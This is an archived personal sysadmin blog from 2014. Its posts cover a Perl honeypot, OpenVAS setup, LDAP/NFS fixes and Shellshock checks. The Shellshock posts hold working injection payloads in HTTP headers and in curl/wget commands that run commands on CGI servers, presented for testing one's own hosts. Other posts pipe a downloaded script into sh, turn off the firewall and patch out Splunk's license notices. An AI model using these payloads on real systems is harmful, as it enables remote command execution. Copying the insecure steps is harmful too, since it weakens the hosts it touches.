Friday, December 19, 2014

knock know who's there?

sometimes you just want to set up a virtual system to see if there are any scans going on your network.
 
on an ubuntu 14.04 lts server...
   
 # apt-get install build-essential mail-utils perl

   
run cpan get the following cpan dependencies:  
   
 # cpan  
 > install Net::DNS  
 > install Net::Server  
 > install YAML  
 > install MIME::Lite::TT  
 > install Data::Dumper  
 > install Getopt::Long  
 > install Net::IP::Match::Regexp  
 > exit  
   
place perl script and conf in /usr/local/bin/honey or wherever   
do a little ln action.  
   
 # ln -s /usr/local/honey/honey.conf /etc/honey.conf  
   
set background to 1 in honey.conf to make it turn into a background process.  
   
and... when putting in your ports, if any ports happen to be open when 
honey.pl is called, honey.pl will die.  
 figure them out?  
   
 # netstat -tpln  
   
speaking of which look at the honey.conf below, we're going to be opening 
a scad of ports. tune the system:  
   
 # ulimit -n 70000  
 # echo "32768 65535" >/proc/sys/net/ipv4/ip_local_port_range  
   
test it  
   
 # perl -c honey.pl should return 'OK'  
   
start with  
 # perl /usr/local/honey.pl --config /etc/honey.conf  
   
if running via /etc/rc.local :  
 # chmod +x /etc/rc.local  
   
add the line before exit 0:  
   
perl /usr/local/honey.pl --config /etc/honey.conf  
   
 ##########  
 # honey.pl  
   
 #!/usr/bin/perl  
 # version 1.3  
 package Honey;  
 use MIME::Lite::TT;  
 use Net::DNS;  
 use strict;  
 use warnings;  
 use Data::Dumper;  
 use base qw(Net::Server::PreForkSimple);  
 use YAML;  
 use Getopt::Long;  
 use Net::IP::Match::Regexp qw( create_iprange_regexp match_ip );  
 sub logger($);  
   
 my $configfile = "./honey.conf";  
 GetOptions ("config=s" => \$configfile);  
 my ($hashref, $arrayref, $string) = YAML::LoadFile( $configfile );  
   
 print Dumper($hashref);  
 my %config = %$hashref;  
   
   
 #############################  
 ### CONFIG   
 #############################  
 my $from_email = $config{'from_email'};  
 my $subject   = $config{'subject'};  
 my $to_email  = $config{'to_email'};  
 my $mailserver = $config{'mailserver'};  
 my $mail_thres = $config{'mail_thres'};  
 my $tempfolder = $config{'tempfolder'};  
 my $lp_ref   = $config{'listenports'};  
 my $background = $config{'background'};  
 my $ih_ref   = $config{'ignorehosts'};  
 my $logpath   = $config{'logpath'};  
   
 unless ( 1 &&  
     defined($from_email) &&   
     defined($subject) &&   
     defined($to_email) &&   
     defined($mailserver) &&   
     defined($mail_thres) &&   
     defined($tempfolder) &&   
     defined($lp_ref) &&   
     defined($background) &&   
     defined($ih_ref) &&   
     1 ) {  
     die "invalid configuration\n";  
 }  
   
 unless (defined($logpath)) {  
     print STDERR "No logpath given, will default to /var/log/honey.log";    
     $logpath = "/var/log/honey.log";  
 }  
   
 logger("honey init");  
   
 #############################  
 ### VARS  
 #############################  
 my ($i);  
 my @lports   = @$lp_ref;  
 my @ih     = split(",",$ih_ref);  
 my $ignorehosts = create_iprange_regexp(@ih);  
 my $tempcache  = $tempfolder . "honeycache";  
 my $tempports  = $tempfolder . "honeyports";  
   
   
 my $template = <<TEMPLATE;  
 Unauthorized connection noted \n\r  
 Connection details: [% connection_string %] \n\r  
 Source details: [% srcip %] ([% srcip_dns %]) \n\r  
 Timestamp: [% timestamp %]  
 TEMPLATE  
   
   
 ############################################  
   
   
 sub post_accept {  
     #print STDERR "post accept in $$\n";  
 }   
   
 sub process_request {  
     my $self = shift;  
   
     #print STDERR "process request in $$\n";  
   
     my $connection_info = $self->{'server'}->{'peeraddr'} . ":" . $self->{'server'}->{'peerport'};  
     $connection_info = $connection_info . " --> " . $self->{'server'}->{'sockaddr'} . ":" . $self->{'server'}->{'sockport'};  
     connection_identified( $self->{'server'}->{'peeraddr'}, $connection_info);  
       
 }  
   
   
 sub connection_identified ($$) {  
     my $srcIP        = $_[0];  
     my $connection_info   = $_[1];  
   
     logger("ok we got a connection from $srcIP");  
   
     # RESTORE HASH  
     my $ref = restore_hash();  
     my %last_email_timestamp = %$ref;  
     my $skip_email = 0;  
   
     # check if we should ignore this IP  
     if (match_ip($srcIP, $ignorehosts)) {  
         logger("ignoring $srcIP!");  
         $skip_email = 1;  
         return 0;  
     }  
   
     # email max every $mail_thres secs   
     my $current_timestamp = time();  
     if (defined($last_email_timestamp{$srcIP})) {  
         logger("We have already seen a connection from the host before");  
       
         my $diff = $current_timestamp - $last_email_timestamp{$srcIP};  
         if ( $diff < $mail_thres) {  
             logger("OK so we saw a connection less than $mail_thres secs ago .. skippin email");  
             $skip_email = 1;  
         } else {  
             logger("but it was a long time ago, diff is $diff");  
         }  
     } else {  
         logger("we have not seen this IP before");  
     }  
     $last_email_timestamp{$srcIP} = $current_timestamp;  
     save_hash(\%last_email_timestamp);  
   
     if ($skip_email) { return; };  
     logger("ok gonna send an email using $mailserver, timeout 60");  
   
     # reverse dns  
     my $srcip_dns = PTR_lookup($srcIP);  
   
     # timestamp  
     my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);  
     my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d\n",$year+1900,$mon+1,$mday,$hour,$min,$sec);  
   
     # SEND EMAIL?  
     my %params;  
     $params{connection_string}  = $connection_info;  
     $params{srcip_dns}   = $srcip_dns;  
     $params{srcip}     = $srcIP;  
     $params{timestamp}   = $timestamp;  
   
     my $msg = MIME::Lite::TT->new(  
       From     => $from_email,  
       To      => $to_email,  
       Subject   => $subject,  
       Template   => \$template,  
       TmplParams  => \%params,  
     );  
   
     $msg->send('smtp', $mailserver, Timeout => 60 );  
     logger("email sent using $mailserver");  
 }  
   
 sub PTR_lookup {  
     my $tname = shift;  
     my $type = "Reverse (PTR)";  
   
     my $rr;  
   
     my $res = new Net::DNS::Resolver;  
     my $query = $res->query("$tname","PTR");  
   
     if ($query) {  
         foreach $rr ($query->answer) {  
             next unless $rr->type eq "PTR";  
             my $ip = $rr->ptrdname;  
             return ($ip);  
         }  
     } else {  
         my $logstring = "Reverse lookup query failed for $tname : " . $res->errorstring . "\n";  
         logger($logstring);  
         return ($tname);  
     }  
 }   
   
 sub restore_hash() {  
   
     my %thash = ();  
     if (-e $tempcache) {  
         open(FOO,"<$tempcache") or die;  
         foreach my $line (<FOO>) {  
             chomp($line);  
             my ($ip,$time) = split(":",$line);  
             $thash{$ip} = $time;  
         }  
         close(FOO);  
     }  
   
     return \%thash;  
 }  
   
 sub save_hash($) {  
     my $hash_ref = $_[0];  
   
     my %thash = %$hash_ref;  
   
     open(FOO,">$tempcache") or die;  
     foreach my $key (keys %thash) {  
         if (defined($thash{$key})) {  
             print FOO $key . ":" . $thash{$key} . "\n";  
         }  
     }  
     close(FOO);  
   
 }  
   
 sub logger($) {  
     my $message = $_[0];  
   
     # LOG  
     open(POO,">>$logpath") or die;  
     print POO get_date() . ": $message\n";  
     close(POO);   
   
     # STDERR  
     print STDERR get_date() . ": $message\n";  
   
 }  
   
 sub get_date () {  
     my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);  
     my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d\n",$year+1900,$mon+1,$mday,$hour,$min,$sec);  
     chop($timestamp);  
     return $timestamp;  
 }  
   
   
 open(FOO,">$tempports") or die;  
 foreach my $lport (@lports) {  
       
     if ($lport =~ /(\d+)-(\d+)/) {  
         my $startport = $1;  
         my $stopport = $2;  
         if ($stopport < $startport) { die "Invalid config, check the range\n"; };  
         for ($i=$startport;$i<=$stopport;$i++) {  
             print FOO "port $i\n";  
         }  
     } elsif ($lport =~ /^(\d+)/) {  
         print FOO "port $lport\n";  
     } else {  
         logger("Invalid port $lport specified");  
     }  
 }  
 close(FOO);  
   
 if ($background) {  
     Honey->run(   background => 1,  
         conf_file => "$tempports");  
 } else {  
     Honey->run(conf_file => "$tempports");  
 }  
   
 ##########  
 # honey.conf  
   
 from_email: me@here  
 to_email: you@there  
 mailserver: smtpserver  
 ignorehosts: 10.10.10.10, 0.0.0.0  
 mail_thres: 60  
 tempfolder: /tmp/  
 subject: Unauthorized connection to knockknock  
 background: 1  
 logpath: /var/log/honeylog.log  
 listenports:  
   - 1-21  
   - 23-24  
   - 26-65500  
   

apache logs to syslog

the other day i flipped out. well, flipped out in my own quiet way. i heard about some apache access issues and it gave me a slight headache. the super cool thing about linux boxes is that the "truth is in the logs". and i heart logs and log aggregation.

the cool thing about apache is that if configured correctly it will log all access and all errors. sadly, apache, by default, writes its logs on the local system and not via syslog processes. crap.
i really really don't want to go to each of my boxes and grep through /var/log/apache/blah.txt, how do i throw the logs access the network?

well, most linux boxes have tee and logger. tee is a nice program that basically say, do this and this. logger can send arbitrary data to syslog. yay.

in my enabled site, i changed my ErrorLog and CustomLog sections from this:

ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
to this:

ErrorLog "|/usr/bin/tee -a /var/log/apache2/error.log | /usr/bin/logger -thttpd -plocal6.err"
CustomLog "|/usr/bin/tee -a /var/log/apache2/access.log | /usr/bin/logger -thttpd -plocal6.notice" combined
i'm calling local6 and sending it off to syslog in httpd format. neat.

since i'm using rsyslogd, i edited my /etc/rsyslog.d/50-default conf to pipe off my logs to my remote syslog server:
auth,authpriv.*;local6.* @remotesyslogserver
if you'd rather not log to /var/log/syslog, add: local6.none to the -/var/log/messages stanza.

reload your daemons and voila.

Wednesday, December 17, 2014

openvas v7 create a new user

well. there are so many ways to create a user. this allows for integration with greenbone security desktop; a scanner user.
root@openvas:~#  openvasmd --create-user younotme
User created with password 'd25d4c66-5f7a-4156-84ee-f3ee101381fa'.

root@openvas:~# openvasmd --user=younotme --new-password=notcreatedhere
that was easy.

Monday, December 8, 2014

create a user via commandline in osx

 create a local user with local user group in macos x  
   
 list existing local gids:  
 # dscl . -list /Groups PrimaryGroupID | awk '{print $2}' | sort -n  
   
 for new group, choose numeric id not in list; above 1000 is good.  
 # dscl . -create /Groups/localgroup  
 # dscl . -create /Groups/localgroup PrimaryGroupID 1001  
   
 did you press enter?  
   
 # dscl . -read /Groups/localgroup  
   
 AppleMetaNodeLocation: /Local/Default  
 GeneratedUID: 00A738DA-21B7-4CD2-B5D9-7873C77205D1  
 PrimaryGroupID: 1001  
 RecordName: localgroup 
 RecordType: dsRecTypeStandard:Groups  
   
 list existing local uids:  
 # dscl . -list /Users UniqueID | awk '{print $2}' | sort -n  
   
 for new user, choose numberic id not in lists; above 1000 is good.  
 # dscl . -create /Users/localuser  
 # dscl . -create /Users/localuser UserShell /bin/bash  
 # dscl . -create /Users/localuser RealName "Local Users"  
 # dscl . -create /Users/localuser UniqueID "1001"  
 # dscl . -create /Users/localuser PrimaryGroupID 1001  
 # dscl . -create /Users/localuser NFSHomeDirectory /Users/localuser  
   
 did you really do all that?  
   
 # dscl . -read /Users/localuser  
   
 AppleMetaNodeLocation: /Local/Default  
 NFSHomeDirectory: /Users/localuser  
 GeneratedUID: 47D6D841-C7F1-4962-9F7E-167E8BFC3A91  
 PrimaryGroupID: 1001  
 RealName: localuser  
 RecordName: localuser  
 RecordType: dsRecTypeStandard:Users  
 UniqueID: 1001  
 UserShell: /usr/bash  
   
 create home directory.  
 # mkdir /Users/localuser  
 # chown localuser:localgroup /Users/localuser  
   
 give localuser a password:  
 # password localuser  
   
 # su - localuser  
   
 $  
   
 neat!  
   

Friday, December 5, 2014

netapp exports and hate

 i have a netapp on premises.  
it has a couple vfilers. i wanted to create an additional vfiler. sadly, i couldn't.  hate.  i hate.
 
i created a volume and i needed to make it have special non-nfsv4 settings cause that's just how the world goes.  

but! for whatever reason the netapp won't let me edit /etc/exports via a mount on a management host. it just won't.  

so, here's what you do, and you'll see what this is a pain.  

ssh root@freakonetapp  

rdfile /etc/exports  

(and out spits a lot of stuff)  

/vol/crap     -sec=sys,rw,root=10.6.6.66,nosuid  
/vol/crap2     -sec=sys,rw,root=10.6.6.66,nosuid  

i need to change /vol/crap2 and add yet another management host.  

so, copy all the lines that spit out on the screen. make your spiffy changes on an editor somewhere and issue:  

wrfile /etc/export  

(copy your spiffy changes you had in an editor elsewhere)  

/vol/crap     -sec=sys,rw,root=10.6.6.66,nosuid  
#/vol/crap2     -sec=sys,rw,root=10.6.6.66,nosuid  
/unix-crap     -actual=/vol/crap2,sec=sys,rw,root=10.6.6.66:10.6.66.6,nosuid  

Ctrl-C  
And reexport nfs:  

exportfs -a  

Thursday, December 4, 2014

am i slob or am i lazy? let's find -exec chown

 le sigh. LE SIGH. sometimes people like to do things on their own out of expediency or   
 because their local sysadmin is a lazy lazy lazy slob.
  
 i'm not a slob.  

 the issue was that someonenotme updated ubuntu and nfs was broke. or rather,   
 their home dir wasn't mounted.  

 this had been the case for months.   

 sure, i could put this line in /etc/fstab and go my merry way:  

 slobberserver:/home     /home     nfs   rsize=8192,wsize=8192,soft,_netdev   0 0  

 but, i'm not a slob.  

 see that _netdev? that's an awesome directive that says, "hey linuxbox  
 do not mount me till the network stack it up". awesome.  

 here's what you do:  

 record someonenotme's local system uid & gid  
 # id someonenotme  
 uid=1000(someonenotme) gid=1000(someonenotme)  

 kill all someonenotme processes  
 # kill -9 `ps -ef|grep someonenotme| awk '{print $2}'`  

 really really?  
 # lsof |grep someonenotme  
 ... nada ...  

 ldap & nfs-ize the system  
 # apt-get install nscd autofs ldap-client  

 put all your specially conf'd ldap conf files in /etc  

 refresh the name service  
 # /etc/init.d/nscd restart  

 # id someonenotme  
 uid=15288(someonenotme) gid=101(someonenotme) groups=100(users)  

 edit passwd and change someonenotme's uid and gid to that in ldap.  

 oh, and make sure the homedir matches, too.  
 # vipasswd  

 now we change all the uids and gids so that someonenotme matches what we have in ldap.  
 to prevent an unfun time, first umount all nfs mounts of interest.  
 # umount /home  

 now we look and change:  
 # find / -uid 1000 -gid 1000 -exec chown 15288:101 {} \;   

 after this is complete, mount -a and go about your business.  

 but wait! you cd'd into their dir, didn't you?  you saw they've done stuff as root 
 in the past.  crud.  why did you ls -la?
 # find /home/someonenotme -uid 0 -gid 0 -exec chown 15288:101 {} \;

 still not a slob.  

Tuesday, November 25, 2014

tell me lies

go ahead. work.
# apt-get install libnss-ldap ldap-utils libsasl2-modules-gssapi-mit heimdal-clients libpam-heimdal
# ldapsearch -h server you.there.com

Monday, November 17, 2014

splunk revelations and dayquil

i am taking dayquil today and somehow i decided to no longer like splunk's nag screen and to no longer like splunk's check for updates feature.

 oh splunk. i love you. but i hate you. i want you to be free, but life is never that nice, is it?  
 here're some useful things for me and me alone.  
 remove splunk trial notifications  
 sure, splunk is free to use with < 500mb/day.  
 by default has a notification at the top of the gui offering a for-pay license. To remove it,   
 2 lines need to be commented. change this lines in:  
 /opt/splunk/lib/python2.5/site-packages/splunk/appserver/oxiclean/SearchService.py:  
 {{{  
     # nagware D) if the user is using a free version of the software -- nag them constantly on every page!  
     if (licenseInfo.find(".//product") != None):  
       productVersion = licenseInfo.find(".//product").text  
       #logger.debug("this is a %s server" % productVersion )  
         if (productVersion == "free"):  
           self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )  
 }}}  
 to:  
 {{{  
     # nagware D) if the user is using a free version of the software -- nag them constantly on every page!  
     if (licenseInfo.find(".//product") != None):  
       productVersion = licenseInfo.find(".//product").text  
       #logger.debug("this is a %s server" % productVersion )  
 #       if (productVersion == "free"):  
 #         self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )  
 }}}  
 do not get smart and do this:  
     # nagware E) if the user is using a free version of the software -- nag them constantly on every page!  
     #logger.debug("checking for nagware state E")  
     if (licenseInfo.find(".//type") != None):  
       productType = licenseInfo.find(".//type").text  
       #logger.debug("this is a %s license" % productType )  
       if (productType == "trial"):  
 #        timeRemainingMessage, licenseState = self.getLicenseTimeRemainingString(licenseInfo)  
 #        self.setSystemError("nagwareTime", timeRemainingMessage )  
 removing splunk update check  
 when splunk starts it looks for updates. stop that, okay?  
 change this line in:  
 /opt/splunk/etc/system/default/web.conf  
 updateCheckerBaseURL = http://quickdraw.splunk.com/js/  
 to:  
 updateCheckerBaseURL = 0  
 howto have splunk listen to arbitrary ports  
 if UDP/TCP 514 are defined in inputs, obviously a daemon running as a not root-user is unable to open these socket connections.  
 to open socket connections for these and any other... run splunk as root (say it ain't so).   
 or use iptables and redirect to whereever splunk is listening. gross.   
 or edit syslog's conf file to plop all traffic somewhere and have splunk snarf it up. logrotate. eh.  

Thursday, October 30, 2014

script for centos 7 & openvas 7 install

centos 7 minimal. as in minimal. as in not even has netstat.

yum update
yum install wget
yum install isomd5sum
wget -q -O - http://www.atomicorp.com/installers/atomic |sh
yum -y install openvas
openvas-setup
systemctl stop firewalld
systemctl disable firewalld
openvas-mkcert-client -n om -i
openvasmd --rebuild
openvasmd

restart all daemons.

tell me sweet lies about arachni, will you?

wget http://downloads.arachni-scanner.com/arachni-0.4.6-0.4.3-linux-x86_64.tar.gz
tar xzvf arachni-0.4.6-0.4.3-linux-x86_64.tar.gz
mv arachni-0.4.6-0.4.3 /usr/local/.
ln -s /usr/local/arachni-0.4.6-0.4.3 /usr/local/arachni
ln -s /usr/local/arachni/bin/arachni* /usr/bin/
ln -s /usr/local/arachni/bin/readlink_f.sh /usr/bin/

Thursday, October 23, 2014

will grep for food

although zless does the job, too.

so. my mx host changed. and you know a whole lot of my boxes simply do not not use smarthost for mail relay. that's okay. or is it?

not really. because all those hosts need to have their zillion hosts files and bizarro mail conf files updated. and of course i'm not using chef or puppet or using anything sane. who would do that? not me, of course.

but! i do backup etc directories in a central, safe place. i can totally grep them, right? no. they're all compressed.

zless to the rescue!

 #!/bin/bash  
 cd /safe/archive  
 for i in $( ls |grep tgz ); do  
     echo $i >> busted  
     zless $i | grep oldmailhost >> busted  
 done  

and then, knowing the tgz i can rgrep the snot out of it and find where that string resides. go to said server and grep -r away.

Wednesday, October 15, 2014

i get tired of paths

i do.
 cd /usr/local && tar --strip-components 1 -xzf \  
 /path/to/crap-<version>-<platform>-<arch>.tar.gz  
 plops in local. libs, binaries and all.  

openvas & nasl

 openvas-nasl -d -t mysystem.oh.no -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl  
 openvas-nasl -d -t 192.168.6.0/24 -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl set key www/80/keepalive -> yes  

esx 5 pubkeys

 To allow SSH access to ESXi/ESX hosts with public/private key authentication:  
 Generate public/private keys. 
 Notes  
 These instructions generate two files in ~/.ssh: id_rsa and id_rsa.pub.  
 In ESXi 5.x, the ssh-keygen command is located at /usr/lib/vmware/openssh/bin.  
 
On the remote host, store the public key content, id_rsa.pub in ~/.ssh/authorized_keys.  
 Notes  
 For ESXi 5.0, the location of authorized_keys is: /etc/ssh/keys-<username>/authorized_keys  
 More than one key can be stored in this file.  
 To allow root access, changePermitRootLogin no to PermitRootLogin yes in the /etc/ssh/sshd_config file.  
 To disable password login, ensure thatChallengeResponseAuthentication and PasswordAuthentication are set to no.  
 Reload the service:  
 For ESXi, run the command:  
 /etc/init.d/SSH restart  
 For ESX, run the command:  
 service sshd reload  

Monday, October 13, 2014

the shocker

sure... we have centralized everything. what we sysadmins do have are pubkeys all over the place. so how do we figure out how much of a pain patching for the many shellshock and aftershock systems that are on our networks? well crap. first is enumerate. yank the dns zone files, clean them up and feed them into:
shocking.sh
  #!/bin/bash   
datestamp=$(date +"%m-%d-%Y")
  for ip_addr in $(cat strippedzonefile) ; do   
  ping -q -c 1 $ip_addr &&   
  bash -c "   
   echo \" *** $ip_addr *** \" >> output ;   
   scp -B theshocker.sh root@$ip_addr:/root/ >> output ;   
   ssh -v -o ConnectTimeout=1 -o BatchMode=yes -o ConnectionAttempts=1 \  
      -o PasswordAuthentication=no root@$ip_addr \  
       /bin/bash -c /root/theshocker.sh >> output ;   
   echo \"done\"   
  "   
  done   
cat output | mail -s "shellshock and aftershock report $datestamp" you@somewhere
which scp's and executes theshocker.sh
 #!/bin/sh  
 SHELLSHOCK=`env x='() { :;}; echo true' /bin/bash -c "" 2>/dev/null`  
 AFTERSHOCK=`env var='() {(a)=>\' /bin/bash -c "echo date | grep -v date" 2>/dev$`  
 if [ -n "$SHELLSHOCK" ]  
 then  
 echo "cve-2014-6271 vulnerability detected - shellshock";  
 else  
 echo "cve-2014-6271 not detected - shellshock"  
 fi  
 if [ -n "$AFTERSHOCK" ]  
 then  
 echo "cve-2014-7169 vulnerability detected - aftershock";  
 else  
 echo "cve-2014-7169 not detected - aftershock"  
 fi  
which outputs to output:
*** 192.168.6.199 ***
cve-2014-6271 vulnerability detected - shellshock
cve-2014-7169 vulnerability detected - aftershock
 *** 192.168.6.20 ***
 *** 192.168.6.21 ***
you get the picture.

zone file to happy ips

grep -E "192\.168\.(13[6-9]|14[0-2])\.[0-9]{1,3}" db.aname.zone | sort | uniq > finessed

Monday, September 29, 2014

thanks f5

GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23 10.1.1.1

Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  
if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.

Wednesday, September 24, 2014

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
#!/bin/sh
echo start "$(date)" >> /var/log/cpio.log ;
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ;
echo end "$(date)" >> /var/log/cpio.log ;

Wednesday, September 17, 2014

install gcc notes

1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN) 

2) Check to make sure install.sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/

or...

1) Search for an rpm package for your specific OS, e.g.:

http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34

2) You can make a symbolic link to the newly uploaded gcc in /usr/bin

Wednesday, August 27, 2014

Tuesday, August 26, 2014

samba & static wins entries

yes. you need to think about this from time to time.

 Static WINS Entries  
   
Adding static entries to your Samba WINS server is actually fairly easy. All you have to do is add a 
line to wins.dat, typically located in /usr/local/samba/var/locks or /var/run/samba.  
   
Entries in wins.dat take the form of:  
   
 "NAME#TYPE" TTL ADDRESS+ FLAGS  
   
where NAME is the NetBIOS name, TYPE is the NetBIOS type, TTL is the time-to-live as an absolute 
time in seconds, ADDRESS+ is one or more addresses corresponding to the registration, and FLAGS 
are the NetBIOS flags for the registration.  
   
A change that has been made to the wins.dat will not take effect until nmbd has been restarted. 
It should be noted that since the wins.dat file changes dynamically, nmbd should be stopped before editing 
this file. Do not forget to restart nmbd when this file has been edited.  
   
A typical dynamic entry looks like this:  
   
 "MADMAN#03" 1155298378 192.168.1.2 66R  
   
To make a NetBIOS name static (permanent), simply set the TTL to 0, like this:  
   
 "MADMAN#03" 0 192.168.1.2 66R  
   
The NetBIOS flags may be interpreted as additive hexadecimal values:  
   
 00 - Broadcast node registration  
 20 - Peer node registration  
 40 - Meta node registration  
 60 - Hybrid node registration  
 02 - Permanent name  
 04 - Active name  
 80 - Group name.  
   
The 'R' indicates this is a registration record.   
Thus 66R means: Hybrid node active and permanent NetBIOS name. These values may be found in the 
nameserv.h header file from the Samba source code repository. These are the values for the NB flags.   
   
   
 nameserv.h  
   
    92 /* The wins flags. Looks like the nbflags ! */  
    93 #define WINS_UNIQUE     0x00 /* Unique record */  
    94 #define WINS_NGROUP     0x01 /* Normal Group eg: 1B */  
    95 #define WINS_SGROUP     0x02 /* Special Group eg: 1C */  
    96 #define WINS_MHOMED     0x03 /* MultiHomed */  
    97   
    98 #define WINS_ACTIVE     0x00 /* active record */  
    99 #define WINS_RELEASED     0x04 /* released record */  
   100 #define WINS_TOMBSTONED 0x08 /* tombstoned record */  
   101 #define WINS_DELETED     0x0C /* deleted record */  
   102   
   103 #define WINS_STATE_MASK     0x0C  
   104   
   105 #define WINS_LOCAL     0x00 /* local record */  
   106 #define WINS_REMOTE     0x10 /* remote record */  
   107   
   108 #define WINS_BNODE     0x00 /* Broadcast node */  
   109 #define WINS_PNODE     0x20 /* PtP node */  
   110 #define WINS_MNODE     0x40 /* Mixed node */  
   111 #define WINS_HNODE     0x60 /* Hybrid node */  
   112   
   113 #define WINS_NONSTATIC     0x00 /* dynamic record */  
   114 #define WINS_STATIC     0x80 /* static record */  

Friday, August 22, 2014

finding orphaned vmware templates or vmtx hell

what happens when templates and parent directories haven't consistent names or reside in 
directories that share the same name, and of course, are all over the place? you sigh.  

then you "open the book".  and when i say "open the book" i mean it the way
the portuguese mean it. think sailor talk, only worse.

vmware isn't very nice in that via vsphere you can't figure out where your "assets" reside. 

that's *okay*. gui fail.  
 
various powershell cli scripts are losers, too. what you need to do is actually query
the sql db that the vcenter uses.

so, off i go to vmware's support site; and i find this:  
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2004139  

COOL. install more junk on my system. since this is running sql server 2008 express,   
i get this:  
http://www.microsoft.com/en-us/download/details.aspx?id=7593  

flock. i go through the totally non-intuitive install for sql server 2008 studio express.   
just install "a new instance". you're not really installing sql server 2008. i cancelled   
when i saw that under installation. i read up.  and the i went for it.  no worries. 

and then you run the tool.  

of course you've kept the name of your db and passwords handy, right?   
well, if you went with the vmware defaults, just to a network browse, connect to your   
local sql server express db. it should look like: YOUR_VCENTER\VIM_SQLEXP  
and do local auth. it is okay.  

you run this query that vmware support gave you:  

select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"  
From VPX_VM inner join VPX_Entity   
where VPX_VM.FILE_NAME LIKE '%VMNAME%'  
on vpx_vm.ID = vpx_entity.ID   
order by VPX_entity.name;  

it barfs. holy heck. re-write the query and get expected results:  

use VIM_VCDB;  
select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"  
From VPX_VM inner join VPX_Entity   
on vpx_vm.ID = vpx_entity.ID   
order by VPX_entity.name;  

and there you go. of course the datastores are completely unfriendly,   
but you can ssh into your client boxes and figure it out pretty quick.   
of course you can.  

 go get some coffee. you're awesome.  

Tuesday, August 12, 2014

old linux box old samba join old

Adding a Linux domain member machine

configure the smb.conf file with all happiness.  Include workgroup, authentication via domain, etc.

check if config is nifty fine:
% testparm

to check if ldap auth via nsswitch is okay, execute:
%getent passwd
%getent group

join the domain:
% net rpc testjoin -S 'PDC' -U Administrator%yesyes
% net rpc join -U Administrator%oreilly

if errors abound, may need in smb.conf:
client schannel = no

or... just do it again.

afterwards, check if all is fine:
% smbclient -L localhostname

it should show something like:

Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          IPC       IPC Service (bollocks server (Samba 3.0.22))
        IPC$            IPC       IPC Service (bollocks server (Samba 3.0.22))
        localtest       Disk      testing in /usr/local
Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]

        Server               Comment
        ---------            -------
        FARMINGTON           bollocks server (Samba 3.0.22)
        PDC                  onthephone server (Samba 3.0.11)

        Workgroup            Master
        ---------            -------
        ONTHEPHONE           PDC

If the server is a BDC, do not forget to:

% smbpasswd -w 

Monday, August 11, 2014

oh the humanity or updating intel nic drivers on esxi 5.5.0

yeah. fun stuff. so vmware, too lazy to update your isos? search through the archives for the correct async ones and unpack the archive and upload the thing called offline-bundle and then scp up to an esxi host - be sure to have ssh service running, is that what you're telling me to do? okay.

~ # esxcli software vib install -d /vmfs/volumes/yes-local/isos/igb-5.2.5-offline_bundle-1682588.zip 

Installation Result
   Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.
   Reboot Required: true
   VIBs Installed: Intel_bootbank_net-igb_5.2.5-1OEM.550.0.0.1331820
   VIBs Removed: VMware_bootbank_net-igb_5.0.5.1.1-1vmw.550.1.15.1623387

Wednesday, August 6, 2014

ubuntu 9.04 sources.list

jaunty is my friend. it does unfs.
/etc/apt/sources.list

